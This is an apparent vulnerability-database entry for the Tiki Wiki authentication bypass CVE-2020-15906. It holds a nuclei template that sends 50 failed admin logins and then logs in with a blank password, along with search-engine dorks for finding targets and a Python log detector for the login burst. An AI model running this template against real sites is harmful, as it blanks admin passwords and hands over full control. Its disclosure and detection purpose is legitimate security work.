Tiki Wiki CMS GroupWare - Authentication Bypass

Reported by ProjectDiscovery on 03 Jul 2026 03:01:05. Type: nuclei. Source: github.com

Tiki Wiki CMS before 21.2 allows admin password reset to blank after multiple failed logins.

Related entries (family: title, published, reporter):

CNVD: Tiki Authentication Bypass Vulnerability, 25 Oct 2020 00:00, cnvd
Check Point Advisories: Tiki Wiki CMS Authentication Bypass (CVE-2020-15906), 25 Nov 2020 00:00, checkpoint_advisories
CVE: CVE-2020-15906, 22 Oct 2020 17:26, cve
Cvelist: CVE-2020-15906, 22 Oct 2020 17:26, cvelist
GithubExploit: Exploit for Improper Restriction of Excessive Authentication Attempts in Tiki, 23 Jul 2020 09:20, githubexploit
Exploit DB: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass, 21 Oct 2020 00:00, exploitdb
NVD: CVE-2020-15906, 22 Oct 2020 18:15, nvd
Packet Storm: Tiki Wiki CMS Groupware 21.1 Authentication Bypass, 21 Oct 2020 00:00, packetstorm
Prion: Default credentials, 22 Oct 2020 18:15, prion
Positive Technologies: PT-2020-14703 · Tiki · Tiki, 22 Oct 2020 00:00, ptsecurity

Nuclei template:
```yaml
id: CVE-2020-15906

info:
  name: Tiki Wiki CMS GroupWare - Authentication Bypass
  author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu
  severity: critical
  description: |
    tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
  impact: |
    Unauthenticated attackers can trigger 50 failed login attempts to reset the admin password to blank, gaining complete administrative access to the Tiki Wiki CMS and all its content.
  remediation: |
    Upgrade to Tiki Wiki CMS version 21.2 or later.
  reference:
    - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15906
    - https://github.com/Z0fhack/Goby_POC
    - https://github.com/bakery312/Vulhub-Reproduce
    - https://github.com/20142995/Goby
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15906
    cwe-id: CWE-307
    epss-score: 0.27362
    epss-percentile: 0.97816
    cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*
  metadata:
    vendor: tiki
    product: tiki
    shodan-query: title:"Tiki Wiki CMS"
    fofa-query: title="Tiki Wiki CMS"
    google-query: intitle:"Tiki Wiki CMS"
  tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass,vuln

http:
  # Step 1: fetch the login form to obtain the anti-CSRF ticket.
  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: ticket1
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="(.*)"'

  # Step 2: 50 failed admin logins (one per payload), which on vulnerable
  # versions triggers the password reset to blank.
  - raw:
      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login_scr.php

        ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    payloads:
      attempt:
        - nkQ0yYzgF5Er
        - P5UdGflH48W3
        - xFq7vKNLmhZp
        - 8zKtGnh4dW5R
        - CfXp2VbQz8Er
        - Lh3K6vPzM9Xn
        - bG4RxHpY2MdQ
        - 7zNtKh3WqF5L
        - Y8rQ2GpLx9Kn
        - C7KzLmP5X9Vh
        - v3LdX8GmQ5Kn
        - W4NzX6PqL3Ft
        - Q5GhY2VrX7Jk
        - r9KdL4PhY6Gm
        - 8XjVq5LhZ2Kr
        - L5WnQ9KzY8Pr
        - M2XdL5GrY9Kh
        - N6YzP8WkL5Xt
        - G7JqX5VbM2Kp
        - H4PrX8LkY6Gm
        - J5LhY2VqX9Kr
        - 8GrX5NqL2KhY
        - K4WnY9PzM8Xt
        - Q2XkL5PrY8Vh
        - 9JhL4VqX5GrM
        - N2XdY5PqL9Kh
        - W4LhY8KzM5Xt
        - G5JqX2VrY9Kp
        - H9PrL5XkY2Gm
        - L8WnX5KzY9Pr
        - M4XkY2LqV5Gt
        - N5XdL9PqY8Kr
        - P8XnL5VrY2Kh
        - Q4JqX9LhY5Gr
        - V7LkX5PrY2Gt
        - L2WnY9KzX8Pr
        - M9XdL5PqY4Kh
        - N8LhY2VqX5Gr
        - Q7XkL5PrY9Gm
        - X4LhY8WnM5Kp
        - G2JqL5VrY9Kt
        - H7PrX8KzY2Gm
        - J4LhY5VqX9Kr
        - N9XkY2LqP5Gt
        - W8LhY5PrX2Kz
        - G4JqL5XkY9Vr
        - P5WnY2KzL8Gt
        - M7XkY9LhP2Gr
        - Q2JqL5VrY8Kh
        - 2JqL5VrY8Kh
    attack: batteringram
    threads: 50

  # Step 3: fetch a fresh ticket and log in as admin with an empty password.
  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login.php

        ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    extractors:
      - type: regex
        part: body_1
        name: ticket2
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="(.*)"'

  # Step 4: confirm the authenticated admin session on the index page.
  - raw:
      - |
        GET /tiki-index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "System Menu"
          - "Home"
          - "Search"
          - "Wiki"
          - "File Galleries"
          - "Settings"
        condition: and

      - type: word
        words:
          - "Show on admin log-in"
          - "Tiki Setup"
        condition: and
# digest: 4b0a0048304602210081cb80d4856e5d2d706e51480c90afedbb156987c646f4b928ed41b2e70e0fcb022100b824594764c4da0be148b03f9c2cd0a0ca4a277d6070062b7f6366dba9f504ee:922c64590222798bb761d5b6d8e72950
```
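The template above works by sending 50 login POSTs to tiki-login.php in quick succession; from the defender's side, that burst is visible in plain web-server access logs. The following detection helper is an added example (not part of the nuclei template or of Tiki): it parses combined-format access-log lines, counts POSTs to /tiki-login.php per source address inside a sliding window, and flags any source that reaches the 50-attempt threshold. The log format, the 10-minute window and the sample addresses are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Assumed combined access-log format (constructed for this example, not from the page).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/tiki-login.php"   # endpoint used by the template above


def parse_line(line):
    """Parse one log line into (ip, timestamp, method, path); None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"]


def login_bursts(lines, threshold=50, window=timedelta(minutes=10)):
    """Per source IP, the largest number of POSTs to tiki-login.php inside any
    sliding window; returns only sources that reach the threshold (the 50
    failures at which Tiki before 21.2 blanks the admin password)."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].split("?", 1)[0] == LOGIN_PATH:
            events[rec[0]].append(rec[1])
    alerts = {}
    for ip, times in events.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window's left edge
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = peak
    return alerts


def sample_log(attacker_posts=51):
    """Constructed log: one burst from 203.0.113.7 plus a few benign requests."""
    t0 = datetime(2020, 10, 21, 12, 0, 0, tzinfo=timezone.utc)

    def line(ip, t, method, path):
        return f'{ip} - - [{t.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" 200 512'

    lines = [line("203.0.113.7", t0 + timedelta(seconds=i), "POST", LOGIN_PATH)
             for i in range(attacker_posts)]
    lines += [line("198.51.100.2", t0 + timedelta(minutes=i), "POST", LOGIN_PATH)
              for i in range(3)]
    lines.append(line("198.51.100.2", t0, "GET", "/tiki-index.php"))
    return lines
```

A hit from this check on a Tiki instance older than 21.2 should be treated as a probable admin-password reset, not just a brute-force attempt; the remediation is the upgrade named in the template.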

Scores (current as of 04 Feb 2026 07:00): Vulners AI Score 7.2 (high risk); CVSS 2: 7.5; CVSS 3.1: 9.8; EPSS: 0.27362